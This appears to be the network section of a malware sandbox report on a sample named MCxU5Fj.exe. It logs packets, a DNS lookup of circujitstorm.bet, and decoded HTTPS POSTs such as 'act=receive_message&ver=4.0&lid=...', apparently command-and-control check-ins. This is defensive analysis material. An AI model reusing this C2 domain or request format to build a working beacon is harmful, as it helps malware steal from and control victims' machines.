Mar 5, 2025 09:12:33.297522068 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.297525883 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.297537088 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.297568083 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.297580957 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.297605991 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.297624111 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.297657013 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.304374933 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.304389954 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.304404020 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.304411888 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.310565948 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.310632944 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.310717106 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.310971022 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.311005116 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.782403946 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.782535076 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.891839027 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.891858101 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.892884970 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.904253960 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.904284954 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.904468060 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.354815960 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.354887009 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.354934931 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.354959011 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.354979992 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.355029106 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.355031013 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.355046034 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.355127096 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.355148077 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.355154991 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.355214119 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.355228901 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.355235100 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.355284929 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.355292082 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.396944046 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.396975040 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.443883896 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.444194078 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.444287062 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.444355011 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.444355965 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.444370985 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.444417953 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.444426060 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.444502115 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.444551945 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.444756031 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.444773912 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.444792032 CET	49706	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.444798946 CET	443	49706	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.546075106 CET	49709	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.546113968 CET	443	49709	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:35.546243906 CET	49709	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.546627045 CET	49709	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:35.546638966 CET	443	49709	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:36.019306898 CET	443	49709	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:36.019517899 CET	49709	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:36.020817041 CET	49709	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:36.020827055 CET	443	49709	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:36.021027088 CET	443	49709	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:36.032586098 CET	49709	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:36.032747984 CET	49709	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:36.032776117 CET	443	49709	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:40.721405983 CET	443	49709	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:40.721636057 CET	443	49709	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:40.721719980 CET	49709	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:40.721750975 CET	49709	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:40.721766949 CET	443	49709	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:40.740372896 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:40.740420103 CET	443	49713	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:40.740510941 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:40.740956068 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:40.740973949 CET	443	49713	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:41.242748022 CET	443	49713	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:41.242856026 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:41.244486094 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:41.244499922 CET	443	49713	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:41.244776964 CET	443	49713	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:41.246033907 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:41.246210098 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:41.246239901 CET	443	49713	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:41.246289968 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:41.246298075 CET	443	49713	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:41.723701954 CET	443	49713	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:41.723939896 CET	443	49713	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:41.724107027 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:41.724107027 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:41.839119911 CET	49714	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:41.839158058 CET	443	49714	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:41.839217901 CET	49714	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:41.839765072 CET	49714	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:41.839778900 CET	443	49714	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:42.037614107 CET	49713	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:42.037643909 CET	443	49713	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:42.333715916 CET	443	49714	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:42.333859921 CET	49714	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:42.335700035 CET	49714	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:42.335706949 CET	443	49714	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:42.336077929 CET	443	49714	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:42.337621927 CET	49714	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:42.337780952 CET	49714	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:42.337807894 CET	443	49714	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:42.337867022 CET	49714	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:42.337874889 CET	443	49714	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:42.957972050 CET	443	49714	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:42.958048105 CET	443	49714	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:42.958101988 CET	49714	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:42.958219051 CET	49714	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:42.958230972 CET	443	49714	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:43.124588013 CET	49715	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:43.124638081 CET	443	49715	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:43.124744892 CET	49715	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:43.125087023 CET	49715	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:43.125097990 CET	443	49715	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:43.609697104 CET	443	49715	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:43.609797001 CET	49715	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:43.611243010 CET	49715	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:43.611275911 CET	443	49715	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:43.611613989 CET	443	49715	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:43.612777948 CET	49715	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:43.612941027 CET	49715	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:43.612982035 CET	443	49715	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.033504009 CET	443	49715	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.033768892 CET	443	49715	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.033874989 CET	49715	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.054914951 CET	49715	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.054940939 CET	443	49715	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.419770002 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.419827938 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.419913054 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.420317888 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.420326948 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.926428080 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.926572084 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.928530931 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.928535938 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.928855896 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.930440903 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.931519985 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.931556940 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.931669950 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.931710958 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.931819916 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.931864977 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.932005882 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.932030916 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.932178020 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.932204962 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.932358027 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.932385921 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.942187071 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.942349911 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.942384005 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.942420006 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.942591906 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.942617893 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.942640066 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.942656040 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.942672968 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.942759991 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.942760944 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.942791939 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.942792892 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.942828894 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.942859888 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:44.947246075 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:44.947819948 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:55.956608057 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:55.956701040 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:55.956780910 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:55.956959963 CET	49716	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:55.956979036 CET	443	49716	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:55.961946011 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:55.962001085 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:55.962078094 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:55.962428093 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:55.962445021 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.434585094 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.434736967 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.441551924 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.441561937 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.441957951 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.443262100 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.443290949 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.443345070 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901583910 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901643038 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901685953 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901711941 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.901729107 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901772022 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.901778936 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901793957 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901832104 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.901839018 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901882887 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901920080 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.901920080 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901931047 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.901966095 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.902107954 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.902172089 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.902206898 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.902213097 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.902281046 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.902323008 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.902417898 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.902431965 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:56.902447939 CET	49720	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:56.902455091 CET	443	49720	188.114.97.3	192.168.2.8
Mar 5, 2025 09:13:15.280191898 CET	56851	53	192.168.2.8	162.159.36.2
Mar 5, 2025 09:13:15.285320044 CET	53	56851	162.159.36.2	192.168.2.8
Mar 5, 2025 09:13:15.285403967 CET	56851	53	192.168.2.8	162.159.36.2
Mar 5, 2025 09:13:15.290482044 CET	53	56851	162.159.36.2	192.168.2.8
Mar 5, 2025 09:13:15.747744083 CET	56851	53	192.168.2.8	162.159.36.2
Mar 5, 2025 09:13:15.753810883 CET	53	56851	162.159.36.2	192.168.2.8
Mar 5, 2025 09:13:15.753921986 CET	56851	53	192.168.2.8	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 5, 2025 09:12:32.577719927 CET	63047	53	192.168.2.8	1.1.1.1
Mar 5, 2025 09:12:32.601715088 CET	53	63047	1.1.1.1	192.168.2.8
Mar 5, 2025 09:13:15.279587030 CET	53	62628	162.159.36.2	192.168.2.8
Mar 5, 2025 09:13:15.761653900 CET	53	61129	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 5, 2025 09:12:32.577719927 CET	192.168.2.8	1.1.1.1	0x42ca	Standard query (0)	circujitstorm.bet	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 5, 2025 09:12:32.601715088 CET	1.1.1.1	192.168.2.8	0x42ca	No error (0)	circujitstorm.bet		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 5, 2025 09:12:32.601715088 CET	1.1.1.1	192.168.2.8	0x42ca	No error (0)	circujitstorm.bet		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

circujitstorm.bet

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	188.114.97.3	443	7528	C:\Users\user\Desktop\MCxU5Fj.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:12:33 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: circujitstorm.bet
2025-03-05 08:12:33 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-03-05 08:12:33 UTC	562	IN	HTTP/1.1 403 Forbidden Date: Wed, 05 Mar 2025 08:12:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RnBWL7tAEWIojVi4hIpg%2Bn6dMAO3SwgZggsLSc8vBDE8v1sbGD7Dfe4qQaCf6uLFjUvFkretELpIpSk9zu1U5Latf%2BE8JvX0qHK0lzjZTjwEu%2BBGDl96jWQn4ptx%2BB90PDmvbQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b82623beaa4286-EWR
2025-03-05 08:12:33 UTC	807	IN	Data Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-05 08:12:33 UTC	1369	IN	Data Raw: 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e Data Ascii: cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElemen
2025-03-05 08:12:33 UTC	1369	IN	Data Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form
2025-03-05 08:12:33 UTC	1011	IN	Data Raw: 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 Data Ascii: class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>P
2025-03-05 08:12:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49706	188.114.97.3	443	7528	C:\Users\user\Desktop\MCxU5Fj.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:12:33 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: circujitstorm.bet
2025-03-05 08:12:33 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 34 38 31 36 32 36 39 33 38 26 6a 3d Data Ascii: act=receive_message&ver=4.0&lid=yau6Na--7481626938&j=
